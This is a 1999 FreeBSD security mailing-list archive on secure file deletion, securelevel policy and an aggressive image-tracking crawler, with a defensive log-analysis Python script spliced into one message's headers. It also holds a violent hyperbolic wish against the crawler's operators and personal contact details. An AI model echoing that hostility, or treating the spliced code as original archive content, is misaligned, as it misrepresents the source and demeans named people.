Date: Sat, 22 May 1999 15:23:08 +0400 (MSD)
From: "Ilmar S. Habibulin"
To: Warner Losh
Cc: posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG
Subject: Re: secure deletion
In-Reply-To: <199905220836.CAA02030@harmony.village.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, 22 May 1999, Warner Losh wrote:
> I think that what people are saying, if I understand them correctly,
> is that it would be desirable if an entire file system could be told
> to do the shredding delete. This would make it useful for a
> filesystem mounted on /tmp, for example.

You mean _all_ files on that filesystem? Maybe use inheritance - setting
the bit on a directory will automatically wipe all files being deleted in it?

From owner-freebsd-security Sat May 22 06:58:29 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mx01.iafrica.com.na (mx01.iafrica.com.na [196.31.227.173]) by hub.freebsd.org (Postfix) with ESMTP id DC34F151F5 for ; Sat, 22 May 1999 06:58:17 -0700 (PDT) (envelope-from tim@iafrica.com.na)
Received: from dup85-whk.iafrica.com.na ([196.20.4.154] helo=aptiva) by mx01.iafrica.com.na with smtp (Exim 2.11 #1) id 10lCHW-000GpI-00; Sat, 22 May 1999 14:57:43 +0100
Message-ID: <3746B829.E60@iafrica.com.na>
Date: Sat, 22 May 1999 15:59:05 +0200
From: Tim Priebe
Reply-To: tim@iafrica.com.na
X-Mailer: Mozilla 3.01 (Win95; I)
MIME-Version: 1.0
To: wkt@cs.adfa.edu.au
Cc: security@freebsd.org
Subject: Re: Lowering securelevel from console?
References: <199905210635.QAA10497@henry.cs.adfa.edu.au>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Warren Toomey wrote:
>
> Hi all,
> I'm sure this has been discussed before, I've hit the list browse
> web engine with no good results, so...
>
> I think that being able to lower the securelevel as root from the console
> would be a good idea, rather than having to go to single-user mode to make
> changes as required.
>
> I know the current code in kern_mib.c doesn't do this. I'm expecting
> comments back saying that it's not a good idea, you're still net connected.
> Assume I've ifconfig'd all interfaces down :-)
>
> Now, are there any other reasons why lowering securelevel as root from
> the console (and no net connectivity) would be a BAD thing?

If the system is multi-user with terminals or modems attached, you have
just removed the security, with the possibility of having users connected.

Further, if someone knows you lower your secure level without changing to
single user mode, they could set a program running that waits for the
secure level to change, and then does its damage.

For the systems I run in secure mode, I want to know that it only comes out
of secure mode when switched to single user mode.

Tim.
From owner-freebsd-security Sat May 22 07:18:39 1999
Delivered-To: freebsd-security@freebsd.org
Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id 91F1614BF4 for ; Sat, 22 May 1999 07:18:36 -0700 (PDT) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id QAA20476; Sat, 22 May 1999 16:18:31 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id QAA04017; Sat, 22 May 1999 16:18:26 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
To: "Ilmar S. Habibulin"
Cc: posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG
Subject: Re: secure deletion
In-reply-to: Your message of "Wed, 19 May 1999 16:01:45 +0400."
Date: Sat, 22 May 1999 16:18:26 +0200
Message-ID: <4015.927382706@critter.freebsd.dk>
From: Poul-Henning Kamp

In message , "Ilmar S. Habibulin" writes:
>
> Maybe it's a freebsd-fs@ question, but I think that it belongs here too.
> I heard that some Linux fs (maybe ext2fs?) has a secure deletion flag,
> which, being set on an inode (file or dir), causes the content of this file
> to be wiped before deletion, so even if somebody manages to restore the
> file, its content would be unusable. I think that it is a nice feature, and
> I would like to see it in FreeBSD. What would you say?

If somebody decides to implement this in the kernel, please take a look at
the VOP_FREEBLKS() interface, which is where/how it should be done, if at all.

--
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!

From owner-freebsd-security Sat May 22 08:11:42 1999
Date: Sat, 22 May 1999 17:11:38 +0200
From: Eivind Eklund
To: Thomas Valentino Crimi
Cc: brooks@one-eyed-alien.net, Dag-Erling Smorgrav, "Ilmar S. Habibulin", posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG
Subject: Re: secure deletion
Message-ID: <19990522171138.K85583@bitbox.follo.net>
References: <19990521201043.I85583@bitbox.follo.net>
In-Reply-To: ; from Thomas Valentino Crimi on Fri, May 21, 1999 at 03:34:56PM -0400

On Fri, May 21, 1999 at 03:34:56PM -0400, Thomas Valentino Crimi wrote:
> Excerpts from mail: 21-May-99 Re: secure deletion by Eivind Eklund@FreeBSD.OR
> > Either tunefs or chflags - it would be relatively expensive, so if you
> > only need it for some data, it is probably better to have more
> > fine-grained control than per-FS.
>
> Might I also suggest a 'normal' user option for one particular file to
> be securely wiped?

It is not possible to securely delete a file after data has been written to
it unless the wish to do so has been indicated to the kernel from the start
of the file's lifetime. We do de-fragmentation while the FS is running (or
at least that's what I understood the dorealloc code to do).

Eivind.
From owner-freebsd-security Sat May 22 09:01:52 1999
Message-Id: <3746D4C6.4A284FE0@softweyr.com>
Date: Sat, 22 May 1999 10:01:10 -0600
From: Wes Peters
Organization: Softweyr LLC
To: Warner Losh
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: secure deletion
References: <199905220836.CAA02030@harmony.village.org>

Warner Losh wrote:
>
> In message "Ilmar S. Habibulin" writes:
> : On 21 May 1999, Dag-Erling Smorgrav wrote:
> :
> : > Because a mount option can be changed at runtime, whereas a kernel
> : > option cannot. A mount option would allow you to enable the security
> : > feature on file systems which need it but not on file systems which do
> : > not need it, whereas a kernel option would enable it unconditionally
> : > on all file systems.
> : And what about it? I just don't understand why this option must be
> : fs-specific. If a file has no flag, it would be deleted in the ordinary way.
>
> I think that what people are saying, if I understand them correctly,
> is that it would be desirable if an entire file system could be told
> to do the shredding delete. This would make it useful for a
> filesystem mounted on /tmp, for example.

If you're really concerned about security, you'll want this enabled on swap
spaces, too, just in case sensitive data got swapped to disk. You can't avoid
having it on disk while the page is active, but you certainly want it securely
erased when the page is no longer in use.

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters                                       Softweyr LLC
http://www.softweyr.com/~softweyr                wes@softweyr.com

From owner-freebsd-security Sat May 22 10:05:37 1999
Message-Id: <4.2.0.37.19990522105949.0465d4a0@localhost>
Date: Sat, 22 May 1999 11:05:28 -0600
To: security@FreeBSD.ORG
From: Brett Glass
Subject: Denial of service attack from "imagelock.com"

This morning, someone at the domain "imagelock.com" apparently launched a
denial of service attack against a Web server I administer. The abuser was
repeatedly downloading large image files simultaneously. While the log
entries say that the user agent was "Mozilla/3.01C-PBWF", this was clearly
spoofed; no Netscape user could possibly browse that fast.

Because that server has a limited amount of Internet bandwidth, and because
it also handles several dial-up connections and Web sites, many people were
being severely impacted by this abuse. When we attempted to trace the
attack to the source, we noted that the abuser was attempting to prevent
the determination of his or her address by enabling reverse but not forward
name resolution. We locked them out of the Web server, but not before they
brought several e-commerce Web sites to a crawl.

Who are these people?

Sincerely,
Brett Glass, System Administrator

From owner-freebsd-security Sat May 22 10:14:35 1999
Date: Sat, 22 May 1999 10:14:26 -0700 (PDT)
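The pattern Brett describes (many simultaneous large fetches spread over one /24, a browser User-Agent no real browser could sustain, and a source with reverse but no matching forward DNS) is something a defender can pull straight out of the access log. The following is an added example, not code from this thread: it aggregates constructed combined-format log lines per source /24, flags blocks that exceed a request-rate or byte threshold, and includes a forward-confirmed reverse DNS check with injectable resolvers so it runs offline. The 203.0.113.0/24 and 198.51.100.7 addresses, host names and thresholds are assumptions standing in for the values discussed in the thread.

```python
"""Added example (not from the list thread): flag the abusive-crawler traffic
pattern described above from a web server access log, and check whether a
source's reverse DNS is forward-confirmed.  All log lines are constructed;
203.0.113.0/24 (RFC 5737 TEST-NET-3) stands in for the /24 in the thread."""
import ipaddress
import re
import socket
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# NCSA "combined" access log format (Apache's default).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "[^"]*" "(?P<ua>[^"]*)"'
)


def parse_line(line):
    """Return {ip, ts, bytes, ua} for one combined-format line, else None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "bytes": 0 if m.group("bytes") == "-" else int(m.group("bytes")),
        "ua": m.group("ua"),
    }


def find_abusive_blocks(lines, window=timedelta(seconds=60),
                        max_requests=30, max_bytes=5_000_000):
    """Aggregate requests per source /24 (the thread's abuser spread its
    fetches over a whole Class C) and flag blocks whose request count inside
    any `window` exceeds max_requests, or whose total bytes exceed max_bytes.
    Thresholds are assumptions; tune them to the server's real capacity."""
    by_block = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            net = ipaddress.ip_network(rec["ip"] + "/24", strict=False)
            by_block[str(net)].append(rec)

    flagged = {}
    for net, recs in by_block.items():
        recs.sort(key=lambda r: r["ts"])
        peak, start = 0, 0
        for end in range(len(recs)):            # sliding window over time
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            peak = max(peak, end - start + 1)
        total = sum(r["bytes"] for r in recs)
        if peak > max_requests or total > max_bytes:
            flagged[net] = {
                "peak_per_window": peak,
                "bytes": total,
                "hosts": len({r["ip"] for r in recs}),
                "user_agents": sorted({r["ua"] for r in recs}),
            }
    return flagged


def fcrdns_ok(ip, reverse_lookup=lambda a: socket.gethostbyaddr(a)[0],
              forward_lookup=lambda n: socket.gethostbyname_ex(n)[2]):
    """Forward-confirmed reverse DNS: the PTR name must resolve back to `ip`.
    A host set up with reverse but not forward resolution fails this check.
    Resolvers are injectable so the check can be exercised offline."""
    try:
        name = reverse_lookup(ip)
        return ip in forward_lookup(name)
    except OSError:                             # herror/gaierror are OSErrors
        return False


def build_sample_log():
    """Constructed sample: 60 large-image fetches from 40 hosts in one /24
    within 15 seconds, plus five ordinary page views from elsewhere."""
    base = datetime(1999, 5, 22, 9, 30, 0, tzinfo=timezone(timedelta(hours=-6)))
    fmt = "%d/%b/%Y:%H:%M:%S %z"
    lines = []
    for i in range(60):
        ts = (base + timedelta(seconds=i // 4)).strftime(fmt)
        lines.append(f'203.0.113.{10 + i % 40} - - [{ts}] '
                     f'"GET /images/big{i % 7}.jpg HTTP/1.0" 200 480000 '
                     f'"-" "Mozilla/3.01C-PBWF"')
    for i in range(5):
        ts = (base + timedelta(seconds=15 * i)).strftime(fmt)
        lines.append(f'198.51.100.7 - - [{ts}] "GET /index.html HTTP/1.0" '
                     f'200 2300 "-" "Mozilla/4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386)"')
    return lines


if __name__ == "__main__":
    for net, info in find_abusive_blocks(build_sample_log()).items():
        print(net, info)
```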
From: Matthew Dillon
Message-Id: <199905221714.KAA74179@apollo.backplane.com>
To: Brett Glass
Cc: security@FreeBSD.ORG
Subject: Re: Denial of service attack from "imagelock.com"
References: <4.2.0.37.19990522105949.0465d4a0@localhost>

:This morning, someone at the domain "imagelock.com" apparently launched a
:denial of service attack against a Web server I administer. The abuser was
:repeatedly downloading large image files simultaneously. While the log
:entries say that the user agent was "Mozilla/3.01C-PBWF", this was clearly
:spoofed; no Netscape user could possibly browse that fast.
:
:Because that server has a limited amount of Internet bandwidth, and because
:it also handles several dial-up connections and Web sites, many people were
:being severely impacted by this abuse. When we attempted to trace the
:attack to the source, we noted that the abuser was attempting to prevent
:the determination of his or her address by enabling reverse but not forward
:name resolution. We locked them out of the Web server, but not before they
:brought several e-commerce Web sites to a crawl.

    If they are actually making TCP connections, then their IP address is
    likely to be valid. This means you should be able to traceroute the
    IP address to see what the last hop network is. You can then complain
    to that network - I'd call up their NOC.

:Who are these people?

    The information provided is not sufficient for us to make that
    determination. Perhaps if you provided the IP address(es) the attack
    is coming from?
:Sincerely,
:Brett Glass, System Administrator

                                        -Matt
                                        Matthew Dillon

From owner-freebsd-security Sat May 22 10:28:45 1999
Message-Id: <4.2.0.37.19990522112658.0466ec90@localhost>
Date: Sat, 22 May 1999 11:28:28 -0600
To: Matthew Dillon
From: Brett Glass
Subject: Re: Denial of service attack from "imagelock.com"
Cc: security@FreeBSD.ORG
In-Reply-To: <199905221714.KAA74179@apollo.backplane.com>
References: <4.2.0.37.19990522105949.0465d4a0@localhost>

At 10:14 AM 5/22/99 -0700, Matthew Dillon wrote:

> If they are actually making TCP connections, then their IP address is
> likely to be valid. This means you should be able to traceroute the
> IP address to see what the last hop network is. You can then complain
> to that network - I'd call up their NOC.

The addresses were all over one Class C: 209.133.111/24. We've complained
to ABOVE.NET, which seems to have control of that Class C. No response yet.

--Brett Glass

From owner-freebsd-security Sat May 22 11:16:11 1999
Message-Id: <199905221814.MAA06767@harmony.village.org>
To: Wes Peters
Subject: Re: secure deletion
Cc: freebsd-security@FreeBSD.ORG
In-reply-to: Your message of "Sat, 22 May 1999 10:01:10 MDT." <3746D4C6.4A284FE0@softweyr.com>
References: <3746D4C6.4A284FE0@softweyr.com> <199905220836.CAA02030@harmony.village.org>
Date: Sat, 22 May 1999 12:14:55 -0600
From: Warner Losh

In message <3746D4C6.4A284FE0@softweyr.com> Wes Peters writes:
: If you're really concerned about security, you'll want this enabled
: on swap spaces, too, just in case sensitive data got swapped to disk.
: You can't avoid having it on disk while the page is active, but certainly
: want it securely erased when the page is no longer in use.

That would also be desirable in some instances.

Warner

From owner-freebsd-security Sat May 22 11:30:39 1999
From: "Rodney W. Grimes"
Message-Id: <199905221829.LAA04096@gndrsh.aac.dev.com>
Subject: Re: Denial of service attack from "imagelock.com"
In-Reply-To: <4.2.0.37.19990522112658.0466ec90@localhost> from Brett Glass at "May 22, 1999 11:28:28 am"
To: brett@lariat.org (Brett Glass)
Date: Sat, 22 May 1999 11:29:41 -0700 (PDT)
Cc: dillon@apollo.backplane.com (Matthew Dillon), security@FreeBSD.ORG

> At 10:14 AM 5/22/99 -0700, Matthew Dillon wrote:
>
> > If they are actually making TCP connections, then their IP address is
> > likely to be valid. This means you should be able to traceroute the
> > IP address to see what the last hop network is. You can then complain
> > to that network - I'd call up their NOC.
>
> The addresses were all over one Class C: 209.133.111/24. We've complained
> to ABOVE.NET, which seems to have control of that Class C. No response yet.
>

Did you even try the simple way:

gndrsh:root {169}# whois imagelock.com
ImageLock.com (SJCENTER-DOM)                              SJCENTER.COM
Imagelock, INC (IMAGELOCK2-DOM)                           IMAGELOCK.COM

gndrsh:root {170}# whois \!imagelock2-dom
Registrant:
Imagelock, INC (IMAGELOCK2-DOM)
   2125 Powell
   San Francisco, CA 94133
   US

   Domain Name: IMAGELOCK.COM

   Administrative Contact, Technical Contact, Zone Contact:
      Force, Thomas  (TF4115)  info@IMAGELOCK.COM
      415 392 3444
   Billing Contact:
      Force, Thomas  (TF4115)  info@IMAGELOCK.COM
      415 392 3444

   Record last updated on 23-Feb-99.
   Record created on 23-Feb-99.
   Database last updated on 21-May-99 13:16:04 EDT.
   Domain servers in listed order:

   NS1.IMAGELOCK.COM            209.133.111.124
   NS2.IMAGELOCK.COM            209.133.111.140

gndrsh:root {171}# host www.imagelock.com
www.imagelock.com is a nickname for M0001.imagelock.com
M0001.imagelock.com has address 209.133.111.124
M0001.imagelock.com mail is handled (pri=5) by M0001.imagelock.com

gndrsh:root {172}# lynx www.imagelock.com

   Currently tracking over 7,000,000 Websites and 175,000,000 digital assets.

   ImageLock.com - The Ultimate Internet Tracking Tool and Intellectual
   Property (IP) management service, enables you to pin-point the
   information you need, and effortlessly enforce your IP Protection
   policy!

   ImageLock(TM) is the Internet's only source for comprehensive tracking
   of your website's images, logos, audio files, and text phrases across
   the Internet's million of websites, newgroups, FTP sites, etc...

   Imagelock(TM) has developed a state-of-the-art and easy-to-use Internet
   based service which delivers complete solutions from asset location to
   copyright enforcement. You specify the Website - Imagelock(TM) tracks
   your digital media assets and enforces your intellectual property
   rights throughout the Internet!

   Imagelock(TM) can tell you:
      Where are your images (logos, pictures, etc.)?
      Who is hot-linked to your website?
      Where is your name showing up? On a list? In a meta-tag?
      Who has your MP3 files?
      Who is plagiarizing your website?
      Who is using or abusing your intellectual property?

   Imagelock(TM) can provide you:
   ...

I'd say this wasn't a purposeful DOS attack, but a major mistake on the
part of imagelock's techniques...

--
Rod Grimes - KD7CAX - (RWG25)                    rgrimes@gndrsh.aac.dev.com
Accurate Automation, Inc.
Reliable computers for FreeBSD                   http://www.aai.dnsmgr.com

From owner-freebsd-security Sat May 22 16:24:38 1999
Message-Id: <4.2.0.37.19990522171752.04638eb0@localhost>
Date: Sat, 22 May 1999 17:24:16 -0600
To: "Rodney W. Grimes"
From: Brett Glass
Subject: Re: Denial of service attack from "imagelock.com"
Cc: dillon@apollo.backplane.com (Matthew Dillon), security@FreeBSD.ORG
In-Reply-To: <199905221829.LAA04096@gndrsh.aac.dev.com>
References: <4.2.0.37.19990522112658.0466ec90@localhost>

At 11:29 AM 5/22/99 -0700, Rodney W. Grimes wrote:

>Did you even try the simple way:

Yes, I did. Unfortunately, there's no way of telling whether the company is
what it says it is or why it would have attempted to hit the server with so
many rapid-fire requests from multiple IP addresses. I've been trying to
contact the company and hopefully we will know soon. However, in the
meantime, I'd STRONGLY recommend that people firewall its IPs --
209.133.111/24. At best, they're terribly misguided; at worst, they're
outright malicious.

--Brett Glass

From owner-freebsd-security Sat May 22 18:17:14 1999
Date: Sat, 22 May 1999 18:16:25 -0700
From: Gregory Sutter
To: Brett Glass
Cc: security@FreeBSD.ORG
Subject: Re: Denial of service attack from "imagelock.com"
Message-ID: <19990522181624.B93974@001101.zer0.org>
References: <4.2.0.37.19990522105949.0465d4a0@localhost>
In-Reply-To: <4.2.0.37.19990522105949.0465d4a0@localhost>; from Brett Glass on Sat, May 22, 1999 at 11:05:28AM -0600
Organization: Zer0

On Sat, May 22, 1999 at 11:05:28AM -0600, Brett Glass wrote:
> This morning, someone at the domain "imagelock.com" apparently launched a
> denial of service attack against a Web server I administer. The abuser was
> repeatedly downloading large image files simultaneously. While the log
> entries say that the user agent was "Mozilla/3.01C-PBWF", this was clearly
> spoofed; no Netscape user could possibly browse that fast.

imagelock.com has been banned from my web servers ever since they
initiated a DoS attack against me a few months ago. Basically, they
download every accessible file on a website. The company's MO is to
check all images, etc. on a site in order to determine where on the
web "copyrighted information" is being stored, so people can be
prosecuted for misusing copyrighted images.

Not only does their hard-hitting web client suck, their business model
is disgusting. I hate everything about these people; I hope their
skulls accidentally get crushed by a steamroller.

Greg
--
Gregory S. Sutter                       Was Jimi's modem a Purple Hayes?
mailto:gsutter@pobox.com
http://www.pobox.com/~gsutter/
PGP DSS public key 0x40AE3052

From owner-freebsd-security Sat May 22 18:40:55 1999
Date: Sat, 22 May 1999 18:40:20 -0700 (PDT)
From: David Babler
To: Gregory Sutter
Cc: Brett Glass, security@FreeBSD.ORG
Subject: Re: Denial of service attack from "imagelock.com"
In-Reply-To: <19990522181624.B93974@001101.zer0.org>

On Sat, 22 May 1999, Gregory Sutter wrote:

> On Sat, May 22, 1999 at 11:05:28AM -0600, Brett Glass wrote:
> > This morning, someone at the domain "imagelock.com" apparently launched a
> > denial of service attack against a Web server I administer. The abuser was
> > repeatedly downloading large image files simultaneously. While the log
> > entries say that the user agent was "Mozilla/3.01C-PBWF", this was clearly
> > spoofed; no Netscape user could possibly browse that fast.
>
> imagelock.com has been banned from my web servers ever since they
> initiated a DoS attack against me a few months ago. Basically, they
> download every accessible file on a website. The company's MO is to
> check all images, etc. on a site in order to determine where on the
> web "copyrighted information" is being stored, so people can be
> prosecuted for misusing copyrighted images.
>
> Not only does their hard-hitting web client suck, their business model
> is disgusting. I hate everything about these people; I hope their
> skulls accidentally get crushed by a steamroller.

Their web client also gleefully ignores robots.txt, and spent 2 hours here
chasing web-poisoned pages - apparently quitting only when it didn't find
any images to fingerprint. So they're now blocked here at the firewall too -
thanks for the heads-up. Wonder how much they can sell their service for
when they find they don't have access to poke around?
-Dave

From owner-freebsd-security Sat May 22 19:34:12 1999
Date: Sat, 22 May 1999 19:33:12 -0700
From: Gregory Sutter
To: David Babler
Cc: Brett Glass, security@FreeBSD.ORG
Subject: Re: Denial of service attack from "imagelock.com"
Message-ID: <19990522193312.C93974@001101.zer0.org>
References: <19990522181624.B93974@001101.zer0.org>
In-Reply-To: ; from David Babler on Sat, May 22, 1999 at 06:40:20PM -0700
Organization: Zer0

On Sat, May 22, 1999 at 06:40:20PM -0700, David Babler wrote:
>
> > On Sat, May 22, 1999 at 11:05:28AM -0600, Brett Glass wrote:
> > > This morning, someone at the domain "imagelock.com" apparently launched a
> > > denial of service attack against a Web server I administer. The abuser was
> >
> > imagelock.com has been banned from my web servers ever since they
> > initiated a DoS attack against me a few months ago. Basically, they
> > download every accessible file on a website. The company's MO is to
>
> Their web client also gleefully ignores robots.txt as well, and spent 2
> hours here chasing web poisoned pages - apparently quitting only when it
> didn't find any images to fingerprint. So they're now blocked here at the
> firewall too - thanks for the heads-up. Wonder how much they can sell
> their service for when they find they don't have access to poke around?

Likely they will either give up (I doubt they're getting many customers
right now anyway...) or make like the spammers, disguising their entry
points and using third-party relays, etc. At least people's eyes have
been opened by the spammer bag o' tricks.

Greg
--
Gregory S. Sutter                       My reality check just bounced.
mailto:gsutter@pobox.com
http://www.pobox.com/~gsutter/
PGP DSS public key 0x40AE3052

From owner-freebsd-security Sat May 22 20:27:31 1999
Message-Id: <4.2.0.37.19990522212103.04683cc0@localhost>
Date: Sat, 22 May 1999 21:23:59 -0600
To: David Babler, Gregory Sutter
From: Brett Glass
Subject: Re: Denial of service attack from "imagelock.com"
Cc: security@FreeBSD.ORG
References: <19990522181624.B93974@001101.zer0.org>

Greg, David:

Apparently, their ISP, ABOVE.NET, does listen to complaints. It would probably
help others like us if you (and anyone else who's been hit by imagelock.com)
could send accounts of these incidents to noc@above.net,
carlos@akshun.above.net, and dlr@above.net.

--Brett Glass

At 06:40 PM 5/22/99 -0700, David Babler wrote:
>On Sat, 22 May 1999, Gregory Sutter wrote:
>
> > On Sat, May 22, 1999 at 11:05:28AM -0600, Brett Glass wrote:
> > > This morning, someone at the domain "imagelock.com" apparently launched a
> > > denial of service attack against a Web server I administer. The abuser was
> > > repeatedly downloading large image files simultaneously. While the log
> > > entries say that the user agent was "Mozilla/3.01C-PBWF", this was clearly
> > > spoofed; no Netscape user could possibly browse that fast.
> >
> > imagelock.com has been banned from my web servers ever since they
> > initiated a DoS attack against me a few months ago. Basically, they
> > download every accessible file on a website. The company's MO is to
> > check all images, etc. on a site in order to determine where on the
> > web "copyrighted information" is being stored, so people can be
> > prosecuted for misusing copyrighted images.
> >
> > Not only does their hard-hitting web client suck, their business model
> > is disgusting. I hate everything about these people; I hope their
> > skulls accidentally get crushed by a steamroller.
>
>Their web client also gleefully ignores robots.txt as well, and spent 2
>hours here chasing web poisoned pages - apparently quitting only when it
>didn't find any images to fingerprint.
>So they're now blocked here at the
>firewall too - thanks for the heads-up. Wonder how much they can sell
>their service for when they find they don't have access to poke around?
>
>-Dave

From owner-freebsd-security Sat May 22 22:01:46 1999
In-Reply-To: <4.2.0.37.19990522212103.04683cc0@localhost>
References: <19990522181624.B93974@001101.zer0.org> <4.2.0.37.19990522212103.04683cc0@localhost>
Date: Sat, 22 May 1999 21:56:17 -0700
To: security@FreeBSD.ORG
From: John Armstrong
Subject: Re: Denial of service attack from "imagelock.com"

Also hit abuse@above.net. They take these things really seriously, I know;
I have been shut down by them before for relaying mail.

John-

At 9:23 PM -0600 5/22/99, Brett Glass wrote:
>Greg, David:
>
>Apparently, their ISP, ABOVE.NET, does listen to complaints. It would probably
>help others like us if you (and anyone else who's been hit by imagelock.com)
>could send accounts of these incidents to noc@above.net,
>carlos@akshun.above.net, and dlr@above.net.
>
>--Brett Glass
>
>At 06:40 PM 5/22/99 -0700, David Babler wrote:
>
>>On Sat, 22 May 1999, Gregory Sutter wrote:
>>
>> > On Sat, May 22, 1999 at 11:05:28AM -0600, Brett Glass wrote:
>> > > This morning, someone at the domain "imagelock.com" apparently launched a
>> > > denial of service attack against a Web server I administer. The abuser was
>> > > repeatedly downloading large image files simultaneously. While the log
>> > > entries say that the user agent was "Mozilla/3.01C-PBWF", this was clearly
>> > > spoofed; no Netscape user could possibly browse that fast.
>> >
>> > imagelock.com has been banned from my web servers ever since they
>> > initiated a DoS attack against me a few months ago. Basically, they
>> > download every accessible file on a website. The company's MO is to
>> > check all images, etc. on a site in order to determine where on the
>> > web "copyrighted information" is being stored, so people can be
>> > prosecuted for misusing copyrighted images.
>> >
>> > Not only does their hard-hitting web client suck, their business model
>> > is disgusting. I hate everything about these people; I hope their
>> > skulls accidentally get crushed by a steamroller.
>>
>>Their web client also gleefully ignores robots.txt as well, and spent 2
>>hours here chasing web poisoned pages - apparently quitting only when it
>>didn't find any images to fingerprint. So they're now blocked here at the
>>firewall too - thanks for the heads-up. Wonder how much they can sell
>>their service for when they find they don't have access to poke around?
>>
>>-Dave

--------------------------------------------------------------------
"..it seems, to put an even more bizarre twist to the story, that it is
not illegal to export listings of encryption programs. Presumably, the
enemies of freedom cannot read." - Apache : The Definitive Guide

From owner-freebsd-security Sun May 23 12:24:02 1999
Message-Id: <4.2.0.37.19990523131810.04669d30@localhost>
Date: Sun, 23 May 1999 13:23:47 -0600
To: Gregory Sutter
From: Brett Glass
Subject: Re: Denial of service attack from "imagelock.com"
Cc: security@FreeBSD.ORG
In-Reply-To: <19990522181624.B93974@001101.zer0.org>
References: <4.2.0.37.19990522105949.0465d4a0@localhost> <4.2.0.37.19990522105949.0465d4a0@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 06:16 PM 5/22/99 -0700, Gregory Sutter wrote:
>imagelock.com has been banned from my web servers ever since they
>initiated a DoS attack against me a few months ago. Basically, they
>download every accessible file on a website. The company's MO is to
>check all images, etc. on a site in order to determine where on the
>web "copyrighted information" is being stored, so people can be
>prosecuted for misusing copyrighted images.

In short, they scan Person A's Web site for images that are also on
Person B's Web site, and if they find a match, they say, "Let's you and
him fight. Oh, and by the way, you ought to be paying me for finding this
horrible copyright violation." This is one step below an ambulance-chasing
lawyer, IMHO, because they first STIMULATE the conflict and then try to
profiteer on it.

>Not only does their hard-hitting web client suck,

Indeed it does. I found a log that shows that imagelock.com accounted for
*25%* of the traffic on delta.net's Web servers last October. And delta.net
is a *big* ISP! (I hear they recently merged with Concentric, so now
they're bigger still.)

>their business model
>is disgusting. I hate everything about these people; I hope their
>skulls accidentally get crushed by a steamroller.

I don't know whether or not this would help. But complaining to their ISP
probably would.
--Brett

From owner-freebsd-security Sun May 23 13:22: 2 1999
Delivered-To: freebsd-security@freebsd.org
Received: from pro.icp.ac.ru (pro.icp.ac.ru [193.233.43.46])
	by hub.freebsd.org (Postfix) with ESMTP id E3DB514F48
	for ; Sun, 23 May 1999 13:21:50 -0700 (PDT)
	(envelope-from ratebor@cityline.ru)
Received: from vedi.pc.icp.ac.ru (vedi.pc.icp.ac.ru [192.168.253.19])
	by pro.icp.ac.ru (8.9.2/8.8.7) with SMTP id AAA30168;
	Mon, 24 May 1999 00:23:00 +0400 (MSD)
	(envelope-from ratebor@cityline.ru)
Date: Mon, 24 May 1999 00:22:57 +0400
From: Dmitriy Bokiy
X-Mailer: The Bat! (v1.32) UNREG / CD5BF9353B3B7091
Reply-To: Dmitriy Bokiy
X-Priority: 3 (Normal)
Message-ID: <715.990524@cityline.ru>
To: Brett Glass
Cc: security@FreeBSD.ORG
Subject: Re: Denial of service attack from "imagelock.com"
In-reply-To: <4.2.0.37.19990522105949.0465d4a0@localhost>
References: <4.2.0.37.19990522105949.0465d4a0@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Saturday, May 22, 1999, 21:05:28 Brett Glass wrote:

> This morning, someone at the domain "imagelock.com" apparently launched a
> denial of service attack against a Web server I administer. The abuser was
> repeatedly downloading large image files simultaneously. While the log
> entries say that the user agent was "Mozilla
> /3.01C-PBWF", this was clearly spoofed; no Netscape user could possibly
> browse that fast.

> Because that server has a limited amount of Internet bandwidth, and because
> it also handles several dial-up connections and Web sites, many people were
> being severely impacted by this abuse. When we attempted to trace the
> attack to the source, we noted that the abuser was attempting to prevent
> the determination of his or her address by enabling reverse but not forward
> name resolution. We locked them out of the Web server, but not before they
> brought several e-commerce Web sites to a crawl.

They probably used an off-line browser (or several of them). This stuff CAN
do simultaneous downloading of web pages, images or whatever and is rather
configurable. It can be configured to identify itself as MSIE, Netscape,
anonymous or whatever you choose. There are also parameters like the maximum
number of simultaneous threads (the usual default is 10) and so-called
Netiquette options (whether or not to obey the Robot Exclusion Standard,
delay between threads, etc.).

> Who are these people?

So my theory is they are who they honestly said they are.
Just breaking some Netiquette rules, and they must be inspired (or forced)
not to do that anymore.

--Dmitriy

From owner-freebsd-security Sun May 23 13:40:29 1999
Delivered-To: freebsd-security@freebsd.org
Received: from pro.icp.ac.ru (pro.icp.ac.ru [193.233.43.46])
